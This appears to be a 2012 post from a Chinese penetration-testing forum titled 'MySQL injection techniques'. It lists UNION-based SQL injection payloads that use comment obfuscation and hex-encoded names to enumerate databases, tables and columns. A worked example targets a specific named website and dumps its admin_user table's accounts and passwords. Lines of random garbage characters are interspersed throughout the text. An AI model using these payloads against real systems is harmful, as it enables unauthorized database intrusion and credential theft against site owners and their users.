中国网络渗透测试联盟
标题:
mysql注入技巧
[打印本页]
作者:
admin
时间:
2012-9-13 16:29
标题:
mysql注入技巧
查库
! z3 Q/ J8 ~; S1 ?* R4 F2 N2 w% B
0 D2 B- {8 X% ~* ^; {2 I$ r
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
& y; q0 J3 R+ a8 @
7 v5 F$ S* m4 u8 Z8 Y# M
查表
3 l/ b9 [& y# d" o+ [
$ \9 m/ n+ u4 I9 @* q$ u, U7 ?
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
' B/ p7 E+ g. v. `
/ {7 W# t9 R# u* Z4 }( ]; U D
查段
7 l7 F" H4 C3 A) Y$ y2 Q
! |; ~* _1 T& n0 U3 u2 x
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
& e' N$ ]7 X6 E
; w- ^3 Y2 T7 R7 [+ f
4 ]+ i: P# p- A+ f( o j9 V2 x/ ]; k
mysql5高级注入方法暴表
2 U7 n) ~* U( Y( }+ E4 ]4 n- O; v D
1 R7 K; b1 C) g. x8 b- I1 q
例子如下:
, @" ~0 K3 }" C
8 ?* T+ d( H4 q& t
1.爆表
! f3 ~8 h5 l) v
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
, m/ Q1 a4 M/ i
这样爆到第4个时出现了admin_user表。
4 @( v; |: m! h
! I/ l: Y% q: F( f) Y
2.暴字段
2 R' c4 s" @3 R8 o$ } X: G
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
+ `4 v- P/ T% O! ^; {! O7 v
, D8 l0 X! I1 z4 S
+ u1 q: y) x. g5 q. ~
3.爆密码
# O5 \' I, x( q5 t: G2 }, l
http://www.political-security.com/ccaus_content.php?ccausid=13240/
**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
. X4 B0 q K; [) ^0 B* s
9 X# f1 j7 n; P$ t9 u
/ z5 {8 o7 |+ g+ l% ^
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2